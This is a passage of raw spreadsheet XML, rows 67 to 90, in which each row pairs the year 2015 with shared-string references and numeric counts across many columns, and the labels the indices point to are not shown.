      <c r="D67" s="38" t="s">
        <v>276</v>
      </c>
      <c r="E67" s="38">
        <v>2.0</v>
      </c>
      <c r="F67" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G67" s="38">
        <v>2.0</v>
      </c>
      <c r="H67" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I67" s="38">
        <v>1.0</v>
      </c>
      <c r="J67" s="38" t="s">
        <v>249</v>
      </c>
      <c r="K67" s="38">
        <v>3.0</v>
      </c>
      <c r="L67" s="38" t="s">
        <v>255</v>
      </c>
      <c r="M67" s="38">
        <v>3.0</v>
      </c>
      <c r="N67" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O67" s="38">
        <v>1.0</v>
      </c>
      <c r="P67" s="12"/>
      <c r="Q67" s="12"/>
      <c r="R67" s="12"/>
      <c r="S67" s="12"/>
      <c r="T67" s="12"/>
      <c r="U67" s="12"/>
      <c r="V67" s="12"/>
      <c r="W67" s="12"/>
      <c r="X67" s="12"/>
      <c r="Y67" s="12"/>
      <c r="Z67" s="12"/>
      <c r="AA67" s="12"/>
      <c r="AB67" s="12"/>
      <c r="AC67" s="12"/>
    </row>
    <row r="68">
      <c r="A68" s="10">
        <v>2015.0</v>
      </c>
      <c r="B68" s="38" t="s">
        <v>404</v>
      </c>
      <c r="C68" s="38">
        <v>25.0</v>
      </c>
      <c r="D68" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E68" s="38">
        <v>5.0</v>
      </c>
      <c r="F68" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G68" s="38">
        <v>4.0</v>
      </c>
      <c r="H68" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I68" s="38">
        <v>5.0</v>
      </c>
      <c r="J68" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K68" s="38">
        <v>5.0</v>
      </c>
      <c r="L68" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M68" s="38">
        <v>3.0</v>
      </c>
      <c r="N68" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O68" s="38">
        <v>3.0</v>
      </c>
      <c r="P68" s="12"/>
      <c r="Q68" s="12"/>
      <c r="R68" s="12"/>
      <c r="S68" s="12"/>
      <c r="T68" s="12"/>
      <c r="U68" s="12"/>
      <c r="V68" s="12"/>
      <c r="W68" s="12"/>
      <c r="X68" s="12"/>
      <c r="Y68" s="12"/>
      <c r="Z68" s="12"/>
      <c r="AA68" s="12"/>
      <c r="AB68" s="12"/>
      <c r="AC68" s="12"/>
    </row>
    <row r="69">
      <c r="A69" s="10">
        <v>2015.0</v>
      </c>
      <c r="B69" s="38" t="s">
        <v>406</v>
      </c>
      <c r="C69" s="38">
        <v>13.0</v>
      </c>
      <c r="D69" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E69" s="38">
        <v>4.0</v>
      </c>
      <c r="F69" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G69" s="38">
        <v>5.0</v>
      </c>
      <c r="H69" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I69" s="38">
        <v>2.0</v>
      </c>
      <c r="J69" s="38" t="s">
        <v>312</v>
      </c>
      <c r="K69" s="38">
        <v>1.0</v>
      </c>
      <c r="L69" s="38" t="s">
        <v>245</v>
      </c>
      <c r="M69" s="38">
        <v>1.0</v>
      </c>
      <c r="N69" s="12"/>
      <c r="O69" s="12"/>
      <c r="P69" s="12"/>
      <c r="Q69" s="12"/>
      <c r="R69" s="12"/>
      <c r="S69" s="12"/>
      <c r="T69" s="12"/>
      <c r="U69" s="12"/>
      <c r="V69" s="12"/>
      <c r="W69" s="12"/>
      <c r="X69" s="12"/>
      <c r="Y69" s="12"/>
      <c r="Z69" s="12"/>
      <c r="AA69" s="12"/>
      <c r="AB69" s="12"/>
      <c r="AC69" s="12"/>
    </row>
    <row r="70">
      <c r="A70" s="10">
        <v>2015.0</v>
      </c>
      <c r="B70" s="38" t="s">
        <v>412</v>
      </c>
      <c r="C70" s="38">
        <v>23.0</v>
      </c>
      <c r="D70" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E70" s="38">
        <v>5.0</v>
      </c>
      <c r="F70" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G70" s="38">
        <v>1.0</v>
      </c>
      <c r="H70" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I70" s="38">
        <v>5.0</v>
      </c>
      <c r="J70" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K70" s="38">
        <v>3.0</v>
      </c>
      <c r="L70" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M70" s="38">
        <v>3.0</v>
      </c>
      <c r="N70" s="38" t="s">
        <v>274</v>
      </c>
      <c r="O70" s="38">
        <v>3.0</v>
      </c>
      <c r="P70" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q70" s="38">
        <v>3.0</v>
      </c>
      <c r="R70" s="12"/>
      <c r="S70" s="12"/>
      <c r="T70" s="12"/>
      <c r="U70" s="12"/>
      <c r="V70" s="12"/>
      <c r="W70" s="12"/>
      <c r="X70" s="12"/>
      <c r="Y70" s="12"/>
      <c r="Z70" s="12"/>
      <c r="AA70" s="12"/>
      <c r="AB70" s="12"/>
      <c r="AC70" s="12"/>
    </row>
    <row r="71">
      <c r="A71" s="10">
        <v>2015.0</v>
      </c>
      <c r="B71" s="38" t="s">
        <v>423</v>
      </c>
      <c r="C71" s="38">
        <v>18.0</v>
      </c>
      <c r="D71" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E71" s="38">
        <v>4.0</v>
      </c>
      <c r="F71" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G71" s="38">
        <v>6.0</v>
      </c>
      <c r="H71" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I71" s="38">
        <v>2.0</v>
      </c>
      <c r="J71" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K71" s="38">
        <v>2.0</v>
      </c>
      <c r="L71" s="38" t="s">
        <v>245</v>
      </c>
      <c r="M71" s="38">
        <v>4.0</v>
      </c>
      <c r="N71" s="12"/>
      <c r="O71" s="12"/>
      <c r="P71" s="12"/>
      <c r="Q71" s="12"/>
      <c r="R71" s="12"/>
      <c r="S71" s="12"/>
      <c r="T71" s="12"/>
      <c r="U71" s="12"/>
      <c r="V71" s="12"/>
      <c r="W71" s="12"/>
      <c r="X71" s="12"/>
      <c r="Y71" s="12"/>
      <c r="Z71" s="12"/>
      <c r="AA71" s="12"/>
      <c r="AB71" s="12"/>
      <c r="AC71" s="12"/>
    </row>
    <row r="72">
      <c r="A72" s="10">
        <v>2015.0</v>
      </c>
      <c r="B72" s="38" t="s">
        <v>429</v>
      </c>
      <c r="C72" s="38">
        <v>54.0</v>
      </c>
      <c r="D72" s="38" t="s">
        <v>15</v>
      </c>
      <c r="E72" s="38">
        <v>11.0</v>
      </c>
      <c r="F72" s="38" t="s">
        <v>276</v>
      </c>
      <c r="G72" s="38">
        <v>3.0</v>
      </c>
      <c r="H72" s="38" t="s">
        <v>247</v>
      </c>
      <c r="I72" s="38">
        <v>13.0</v>
      </c>
      <c r="J72" s="38" t="s">
        <v>254</v>
      </c>
      <c r="K72" s="38">
        <v>10.0</v>
      </c>
      <c r="L72" s="38" t="s">
        <v>249</v>
      </c>
      <c r="M72" s="38">
        <v>3.0</v>
      </c>
      <c r="N72" s="38" t="s">
        <v>363</v>
      </c>
      <c r="O72" s="38">
        <v>2.0</v>
      </c>
      <c r="P72" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q72" s="38">
        <v>12.0</v>
      </c>
      <c r="R72" s="12"/>
      <c r="S72" s="12"/>
      <c r="T72" s="12"/>
      <c r="U72" s="12"/>
      <c r="V72" s="12"/>
      <c r="W72" s="12"/>
      <c r="X72" s="12"/>
      <c r="Y72" s="12"/>
      <c r="Z72" s="12"/>
      <c r="AA72" s="12"/>
      <c r="AB72" s="12"/>
      <c r="AC72" s="12"/>
    </row>
    <row r="73">
      <c r="A73" s="10">
        <v>2015.0</v>
      </c>
      <c r="B73" s="38" t="s">
        <v>431</v>
      </c>
      <c r="C73" s="38" t="s">
        <v>432</v>
      </c>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row>
    <row r="74">
      <c r="A74" s="10">
        <v>2015.0</v>
      </c>
      <c r="B74" s="38" t="s">
        <v>433</v>
      </c>
      <c r="C74" s="38">
        <v>29.0</v>
      </c>
      <c r="D74" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E74" s="38">
        <v>3.0</v>
      </c>
      <c r="F74" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G74" s="38">
        <v>3.0</v>
      </c>
      <c r="H74" s="38" t="s">
        <v>267</v>
      </c>
      <c r="I74" s="38">
        <v>2.0</v>
      </c>
      <c r="J74" s="38" t="s">
        <v>294</v>
      </c>
      <c r="K74" s="38">
        <v>2.0</v>
      </c>
      <c r="L74" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M74" s="38">
        <v>7.0</v>
      </c>
      <c r="N74" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O74" s="38">
        <v>12.0</v>
      </c>
      <c r="P74" s="12"/>
      <c r="Q74" s="12"/>
      <c r="R74" s="12"/>
      <c r="S74" s="12"/>
      <c r="T74" s="12"/>
      <c r="U74" s="12"/>
      <c r="V74" s="12"/>
      <c r="W74" s="12"/>
      <c r="X74" s="12"/>
      <c r="Y74" s="12"/>
      <c r="Z74" s="12"/>
      <c r="AA74" s="12"/>
      <c r="AB74" s="12"/>
      <c r="AC74" s="12"/>
    </row>
    <row r="75">
      <c r="A75" s="10">
        <v>2015.0</v>
      </c>
      <c r="B75" s="38" t="s">
        <v>437</v>
      </c>
      <c r="C75" s="38">
        <v>28.0</v>
      </c>
      <c r="D75" s="38" t="s">
        <v>248</v>
      </c>
      <c r="E75" s="38">
        <v>6.0</v>
      </c>
      <c r="F75" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G75" s="38">
        <v>3.0</v>
      </c>
      <c r="H75" s="38" t="s">
        <v>439</v>
      </c>
      <c r="I75" s="38">
        <v>1.0</v>
      </c>
      <c r="J75" s="38" t="s">
        <v>250</v>
      </c>
      <c r="K75" s="38">
        <v>4.0</v>
      </c>
      <c r="L75" s="38" t="s">
        <v>267</v>
      </c>
      <c r="M75" s="38">
        <v>2.0</v>
      </c>
      <c r="N75" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O75" s="38">
        <v>2.0</v>
      </c>
      <c r="P75" s="38" t="s">
        <v>186</v>
      </c>
      <c r="Q75" s="38">
        <v>2.0</v>
      </c>
      <c r="R75" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S75" s="38">
        <v>8.0</v>
      </c>
      <c r="T75" s="12"/>
      <c r="U75" s="12"/>
      <c r="V75" s="12"/>
      <c r="W75" s="12"/>
      <c r="X75" s="12"/>
      <c r="Y75" s="12"/>
      <c r="Z75" s="12"/>
      <c r="AA75" s="12"/>
      <c r="AB75" s="12"/>
      <c r="AC75" s="12"/>
    </row>
    <row r="76">
      <c r="A76" s="10">
        <v>2015.0</v>
      </c>
      <c r="B76" s="38" t="s">
        <v>442</v>
      </c>
      <c r="C76" s="38">
        <v>33.0</v>
      </c>
      <c r="D76" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E76" s="38">
        <v>5.0</v>
      </c>
      <c r="F76" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G76" s="38">
        <v>3.0</v>
      </c>
      <c r="H76" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I76" s="38">
        <v>3.0</v>
      </c>
      <c r="J76" s="38" t="s">
        <v>447</v>
      </c>
      <c r="K76" s="38">
        <v>4.0</v>
      </c>
      <c r="L76" s="38" t="s">
        <v>255</v>
      </c>
      <c r="M76" s="38">
        <v>3.0</v>
      </c>
      <c r="N76" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O76" s="38">
        <v>7.0</v>
      </c>
      <c r="P76" s="38" t="s">
        <v>274</v>
      </c>
      <c r="Q76" s="38">
        <v>2.0</v>
      </c>
      <c r="R76" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S76" s="38">
        <v>6.0</v>
      </c>
      <c r="T76" s="12"/>
      <c r="U76" s="12"/>
      <c r="V76" s="12"/>
      <c r="W76" s="12"/>
      <c r="X76" s="12"/>
      <c r="Y76" s="12"/>
      <c r="Z76" s="12"/>
      <c r="AA76" s="12"/>
      <c r="AB76" s="12"/>
      <c r="AC76" s="12"/>
    </row>
    <row r="77">
      <c r="A77" s="10">
        <v>2015.0</v>
      </c>
      <c r="B77" s="38" t="s">
        <v>452</v>
      </c>
      <c r="C77" s="38">
        <v>19.0</v>
      </c>
      <c r="D77" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E77" s="38">
        <v>2.0</v>
      </c>
      <c r="F77" s="38" t="s">
        <v>248</v>
      </c>
      <c r="G77" s="38">
        <v>2.0</v>
      </c>
      <c r="H77" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I77" s="38">
        <v>3.0</v>
      </c>
      <c r="J77" s="38" t="s">
        <v>249</v>
      </c>
      <c r="K77" s="38">
        <v>4.0</v>
      </c>
      <c r="L77" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M77" s="38">
        <v>4.0</v>
      </c>
      <c r="N77" s="38" t="s">
        <v>274</v>
      </c>
      <c r="O77" s="38">
        <v>1.0</v>
      </c>
      <c r="P77" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q77" s="38">
        <v>3.0</v>
      </c>
      <c r="R77" s="12"/>
      <c r="S77" s="12"/>
      <c r="T77" s="12"/>
      <c r="U77" s="12"/>
      <c r="V77" s="12"/>
      <c r="W77" s="12"/>
      <c r="X77" s="12"/>
      <c r="Y77" s="12"/>
      <c r="Z77" s="12"/>
      <c r="AA77" s="12"/>
      <c r="AB77" s="12"/>
      <c r="AC77" s="12"/>
    </row>
    <row r="78">
      <c r="A78" s="10">
        <v>2015.0</v>
      </c>
      <c r="B78" s="38" t="s">
        <v>453</v>
      </c>
      <c r="C78" s="38">
        <v>38.0</v>
      </c>
      <c r="D78" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E78" s="38">
        <v>5.0</v>
      </c>
      <c r="F78" s="38" t="s">
        <v>248</v>
      </c>
      <c r="G78" s="38">
        <v>5.0</v>
      </c>
      <c r="H78" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I78" s="38">
        <v>4.0</v>
      </c>
      <c r="J78" s="38" t="s">
        <v>249</v>
      </c>
      <c r="K78" s="38">
        <v>4.0</v>
      </c>
      <c r="L78" s="38" t="s">
        <v>363</v>
      </c>
      <c r="M78" s="38">
        <v>5.0</v>
      </c>
      <c r="N78" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O78" s="38">
        <v>5.0</v>
      </c>
      <c r="P78" s="38" t="s">
        <v>266</v>
      </c>
      <c r="Q78" s="38">
        <v>5.0</v>
      </c>
      <c r="R78" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S78" s="38">
        <v>5.0</v>
      </c>
      <c r="T78" s="12"/>
      <c r="U78" s="12"/>
      <c r="V78" s="12"/>
      <c r="W78" s="12"/>
      <c r="X78" s="12"/>
      <c r="Y78" s="12"/>
      <c r="Z78" s="12"/>
      <c r="AA78" s="12"/>
      <c r="AB78" s="12"/>
      <c r="AC78" s="12"/>
    </row>
    <row r="79">
      <c r="A79" s="10">
        <v>2015.0</v>
      </c>
      <c r="B79" s="38" t="s">
        <v>454</v>
      </c>
      <c r="C79" s="38">
        <v>19.0</v>
      </c>
      <c r="D79" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E79" s="38">
        <v>3.0</v>
      </c>
      <c r="F79" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G79" s="38">
        <v>4.0</v>
      </c>
      <c r="H79" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I79" s="38">
        <v>4.0</v>
      </c>
      <c r="J79" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K79" s="38">
        <v>4.0</v>
      </c>
      <c r="L79" s="38" t="s">
        <v>266</v>
      </c>
      <c r="M79" s="38">
        <v>4.0</v>
      </c>
      <c r="N79" s="12"/>
      <c r="O79" s="12"/>
      <c r="P79" s="12"/>
      <c r="Q79" s="12"/>
      <c r="R79" s="12"/>
      <c r="S79" s="12"/>
      <c r="T79" s="12"/>
      <c r="U79" s="12"/>
      <c r="V79" s="12"/>
      <c r="W79" s="12"/>
      <c r="X79" s="12"/>
      <c r="Y79" s="12"/>
      <c r="Z79" s="12"/>
      <c r="AA79" s="12"/>
      <c r="AB79" s="12"/>
      <c r="AC79" s="12"/>
    </row>
    <row r="80">
      <c r="A80" s="10">
        <v>2015.0</v>
      </c>
      <c r="B80" s="38" t="s">
        <v>455</v>
      </c>
      <c r="C80" s="38">
        <v>24.0</v>
      </c>
      <c r="D80" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E80" s="38">
        <v>4.0</v>
      </c>
      <c r="F80" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G80" s="38">
        <v>2.0</v>
      </c>
      <c r="H80" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I80" s="38">
        <v>5.0</v>
      </c>
      <c r="J80" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K80" s="38">
        <v>7.0</v>
      </c>
      <c r="L80" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M80" s="38">
        <v>5.0</v>
      </c>
      <c r="N80" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O80" s="38">
        <v>1.0</v>
      </c>
      <c r="P80" s="12"/>
      <c r="Q80" s="12"/>
      <c r="R80" s="12"/>
      <c r="S80" s="12"/>
      <c r="T80" s="12"/>
      <c r="U80" s="12"/>
      <c r="V80" s="12"/>
      <c r="W80" s="12"/>
      <c r="X80" s="12"/>
      <c r="Y80" s="12"/>
      <c r="Z80" s="12"/>
      <c r="AA80" s="12"/>
      <c r="AB80" s="12"/>
      <c r="AC80" s="12"/>
    </row>
    <row r="81">
      <c r="A81" s="10">
        <v>2015.0</v>
      </c>
      <c r="B81" s="38" t="s">
        <v>459</v>
      </c>
      <c r="C81" s="38">
        <v>26.0</v>
      </c>
      <c r="D81" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E81" s="38">
        <v>4.0</v>
      </c>
      <c r="F81" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G81" s="38">
        <v>4.0</v>
      </c>
      <c r="H81" s="38" t="s">
        <v>460</v>
      </c>
      <c r="I81" s="38">
        <v>5.0</v>
      </c>
      <c r="J81" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K81" s="38">
        <v>5.0</v>
      </c>
      <c r="L81" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M81" s="38">
        <v>5.0</v>
      </c>
      <c r="N81" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O81" s="38">
        <v>3.0</v>
      </c>
      <c r="P81" s="12"/>
      <c r="Q81" s="12"/>
      <c r="R81" s="12"/>
      <c r="S81" s="12"/>
      <c r="T81" s="12"/>
      <c r="U81" s="12"/>
      <c r="V81" s="12"/>
      <c r="W81" s="12"/>
      <c r="X81" s="12"/>
      <c r="Y81" s="12"/>
      <c r="Z81" s="12"/>
      <c r="AA81" s="12"/>
      <c r="AB81" s="12"/>
      <c r="AC81" s="12"/>
    </row>
    <row r="82">
      <c r="A82" s="10">
        <v>2015.0</v>
      </c>
      <c r="B82" s="38" t="s">
        <v>461</v>
      </c>
      <c r="C82" s="38">
        <v>20.0</v>
      </c>
      <c r="D82" s="38" t="s">
        <v>462</v>
      </c>
      <c r="E82" s="38">
        <v>2.0</v>
      </c>
      <c r="F82" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G82" s="38">
        <v>7.0</v>
      </c>
      <c r="H82" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I82" s="38">
        <v>1.0</v>
      </c>
      <c r="J82" s="38" t="s">
        <v>249</v>
      </c>
      <c r="K82" s="38">
        <v>4.0</v>
      </c>
      <c r="L82" s="38" t="s">
        <v>274</v>
      </c>
      <c r="M82" s="38">
        <v>5.0</v>
      </c>
      <c r="N82" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O82" s="38">
        <v>1.0</v>
      </c>
      <c r="P82" s="12"/>
      <c r="Q82" s="12"/>
      <c r="R82" s="12"/>
      <c r="S82" s="12"/>
      <c r="T82" s="12"/>
      <c r="U82" s="12"/>
      <c r="V82" s="12"/>
      <c r="W82" s="12"/>
      <c r="X82" s="12"/>
      <c r="Y82" s="12"/>
      <c r="Z82" s="12"/>
      <c r="AA82" s="12"/>
      <c r="AB82" s="12"/>
      <c r="AC82" s="12"/>
    </row>
    <row r="83">
      <c r="A83" s="10">
        <v>2015.0</v>
      </c>
      <c r="B83" s="38" t="s">
        <v>468</v>
      </c>
      <c r="C83" s="38">
        <v>29.0</v>
      </c>
      <c r="D83" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E83" s="38">
        <v>3.0</v>
      </c>
      <c r="F83" s="38" t="s">
        <v>249</v>
      </c>
      <c r="G83" s="38">
        <v>5.0</v>
      </c>
      <c r="H83" s="38" t="s">
        <v>250</v>
      </c>
      <c r="I83" s="38">
        <v>4.0</v>
      </c>
      <c r="J83" s="38" t="s">
        <v>255</v>
      </c>
      <c r="K83" s="38">
        <v>5.0</v>
      </c>
      <c r="L83" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M83" s="38">
        <v>5.0</v>
      </c>
      <c r="N83" s="38" t="s">
        <v>474</v>
      </c>
      <c r="O83" s="38">
        <v>1.0</v>
      </c>
      <c r="P83" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q83" s="38">
        <v>6.0</v>
      </c>
      <c r="R83" s="12"/>
      <c r="S83" s="12"/>
      <c r="T83" s="12"/>
      <c r="U83" s="12"/>
      <c r="V83" s="12"/>
      <c r="W83" s="12"/>
      <c r="X83" s="12"/>
      <c r="Y83" s="12"/>
      <c r="Z83" s="12"/>
      <c r="AA83" s="12"/>
      <c r="AB83" s="12"/>
      <c r="AC83" s="12"/>
    </row>
    <row r="84">
      <c r="A84" s="10">
        <v>2015.0</v>
      </c>
      <c r="B84" s="38" t="s">
        <v>477</v>
      </c>
      <c r="C84" s="38" t="s">
        <v>432</v>
      </c>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row>
    <row r="85">
      <c r="A85" s="10">
        <v>2015.0</v>
      </c>
      <c r="B85" s="38" t="s">
        <v>483</v>
      </c>
      <c r="C85" s="38">
        <v>18.0</v>
      </c>
      <c r="D85" s="38" t="s">
        <v>393</v>
      </c>
      <c r="E85" s="38">
        <v>1.0</v>
      </c>
      <c r="F85" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G85" s="38">
        <v>8.0</v>
      </c>
      <c r="H85" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I85" s="38">
        <v>2.0</v>
      </c>
      <c r="J85" s="38" t="s">
        <v>274</v>
      </c>
      <c r="K85" s="38">
        <v>1.0</v>
      </c>
      <c r="L85" s="38" t="s">
        <v>266</v>
      </c>
      <c r="M85" s="38">
        <v>3.0</v>
      </c>
      <c r="N85" s="38" t="s">
        <v>245</v>
      </c>
      <c r="O85" s="38">
        <v>3.0</v>
      </c>
      <c r="P85" s="12"/>
      <c r="Q85" s="12"/>
      <c r="R85" s="12"/>
      <c r="S85" s="12"/>
      <c r="T85" s="12"/>
      <c r="U85" s="12"/>
      <c r="V85" s="12"/>
      <c r="W85" s="12"/>
      <c r="X85" s="12"/>
      <c r="Y85" s="12"/>
      <c r="Z85" s="12"/>
      <c r="AA85" s="12"/>
      <c r="AB85" s="12"/>
      <c r="AC85" s="12"/>
    </row>
    <row r="86">
      <c r="A86" s="10">
        <v>2015.0</v>
      </c>
      <c r="B86" s="38" t="s">
        <v>489</v>
      </c>
      <c r="C86" s="38">
        <v>20.0</v>
      </c>
      <c r="D86" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E86" s="38">
        <v>5.0</v>
      </c>
      <c r="F86" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G86" s="38">
        <v>1.0</v>
      </c>
      <c r="H86" s="38" t="s">
        <v>494</v>
      </c>
      <c r="I86" s="38">
        <v>6.0</v>
      </c>
      <c r="J86" s="38" t="s">
        <v>495</v>
      </c>
      <c r="K86" s="38">
        <v>2.0</v>
      </c>
      <c r="L86" s="38" t="s">
        <v>255</v>
      </c>
      <c r="M86" s="38">
        <v>1.0</v>
      </c>
      <c r="N86" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O86" s="38">
        <v>2.0</v>
      </c>
      <c r="P86" s="38" t="s">
        <v>274</v>
      </c>
      <c r="Q86" s="38">
        <v>4.0</v>
      </c>
      <c r="R86" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S86" s="38">
        <v>4.0</v>
      </c>
      <c r="T86" s="12"/>
      <c r="U86" s="12"/>
      <c r="V86" s="12"/>
      <c r="W86" s="12"/>
      <c r="X86" s="12"/>
      <c r="Y86" s="12"/>
      <c r="Z86" s="12"/>
      <c r="AA86" s="12"/>
      <c r="AB86" s="12"/>
      <c r="AC86" s="12"/>
    </row>
    <row r="87">
      <c r="A87" s="10">
        <v>2015.0</v>
      </c>
      <c r="B87" s="38" t="s">
        <v>499</v>
      </c>
      <c r="C87" s="38">
        <v>27.0</v>
      </c>
      <c r="D87" s="38" t="s">
        <v>501</v>
      </c>
      <c r="E87" s="38">
        <v>3.0</v>
      </c>
      <c r="F87" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G87" s="38">
        <v>5.0</v>
      </c>
      <c r="H87" s="38" t="s">
        <v>248</v>
      </c>
      <c r="I87" s="38">
        <v>3.0</v>
      </c>
      <c r="J87" s="38" t="s">
        <v>494</v>
      </c>
      <c r="K87" s="38">
        <v>4.0</v>
      </c>
      <c r="L87" s="38" t="s">
        <v>447</v>
      </c>
      <c r="M87" s="38">
        <v>4.0</v>
      </c>
      <c r="N87" s="38" t="s">
        <v>251</v>
      </c>
      <c r="O87" s="38">
        <v>5.0</v>
      </c>
      <c r="P87" s="38" t="s">
        <v>274</v>
      </c>
      <c r="Q87" s="38">
        <v>3.0</v>
      </c>
      <c r="R87" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S87" s="38">
        <v>3.0</v>
      </c>
      <c r="T87" s="12"/>
      <c r="U87" s="12"/>
      <c r="V87" s="12"/>
      <c r="W87" s="12"/>
      <c r="X87" s="12"/>
      <c r="Y87" s="12"/>
      <c r="Z87" s="12"/>
      <c r="AA87" s="12"/>
      <c r="AB87" s="12"/>
      <c r="AC87" s="12"/>
    </row>
    <row r="88">
      <c r="A88" s="10">
        <v>2015.0</v>
      </c>
      <c r="B88" s="38" t="s">
        <v>506</v>
      </c>
      <c r="C88" s="38">
        <v>29.0</v>
      </c>
      <c r="D88" s="38" t="s">
        <v>276</v>
      </c>
      <c r="E88" s="38">
        <v>6.0</v>
      </c>
      <c r="F88" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G88" s="38">
        <v>4.0</v>
      </c>
      <c r="H88" s="38" t="s">
        <v>569</v>
      </c>
      <c r="I88" s="38">
        <v>2.0</v>
      </c>
      <c r="J88" s="38" t="s">
        <v>248</v>
      </c>
      <c r="K88" s="38">
        <v>3.0</v>
      </c>
      <c r="L88" s="38" t="s">
        <v>274</v>
      </c>
      <c r="M88" s="38">
        <v>4.0</v>
      </c>
      <c r="N88" s="38" t="s">
        <v>573</v>
      </c>
      <c r="O88" s="38">
        <v>6.0</v>
      </c>
      <c r="P88" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q88" s="38">
        <v>4.0</v>
      </c>
      <c r="R88" s="12"/>
      <c r="S88" s="12"/>
      <c r="T88" s="12"/>
      <c r="U88" s="12"/>
      <c r="V88" s="12"/>
      <c r="W88" s="12"/>
      <c r="X88" s="12"/>
      <c r="Y88" s="12"/>
      <c r="Z88" s="12"/>
      <c r="AA88" s="12"/>
      <c r="AB88" s="12"/>
      <c r="AC88" s="12"/>
    </row>
    <row r="89">
      <c r="A89" s="10">
        <v>2015.0</v>
      </c>
      <c r="B89" s="38" t="s">
        <v>580</v>
      </c>
      <c r="C89" s="38">
        <v>19.0</v>
      </c>
      <c r="D89" s="38" t="s">
        <v>581</v>
      </c>
      <c r="E89" s="38">
        <v>2.0</v>
      </c>
      <c r="F89" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G89" s="38">
        <v>3.0</v>
      </c>
      <c r="H89" s="38" t="s">
        <v>254</v>
      </c>
      <c r="I89" s="38">
        <v>2.0</v>
      </c>
      <c r="J89" s="38" t="s">
        <v>584</v>
      </c>
      <c r="K89" s="38">
        <v>1.0</v>
      </c>
      <c r="L89" s="38" t="s">
        <v>586</v>
      </c>
      <c r="M89" s="38">
        <v>1.0</v>
      </c>
      <c r="N89" s="38" t="s">
        <v>363</v>
      </c>
      <c r="O89" s="38">
        <v>2.0</v>
      </c>
      <c r="P89" s="38" t="s">
        <v>312</v>
      </c>
      <c r="Q89" s="38">
        <v>1.0</v>
      </c>
      <c r="R89" s="38" t="s">
        <v>593</v>
      </c>
      <c r="S89" s="38">
        <v>1.0</v>
      </c>
      <c r="T89" s="38" t="s">
        <v>274</v>
      </c>
      <c r="U89" s="38">
        <v>3.0</v>
      </c>
      <c r="V89" s="38" t="s">
        <v>245</v>
      </c>
      <c r="W89" s="38">
        <v>3.0</v>
      </c>
      <c r="X89" s="12"/>
      <c r="Y89" s="12"/>
      <c r="Z89" s="12"/>
      <c r="AA89" s="12"/>
      <c r="AB89" s="12"/>
      <c r="AC89" s="12"/>
    </row>
    <row r="90">
      <c r="A90" s="10">
        <v>2015.0</v>
      </c>
      <c r="B90" s="38" t="s">
        <v>598</v>
      </c>
      <c r="C90" s="38">
        <v>5.0</v>
      </c>
      <c r="D90" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E90" s="38">
        <v>1.0</v>
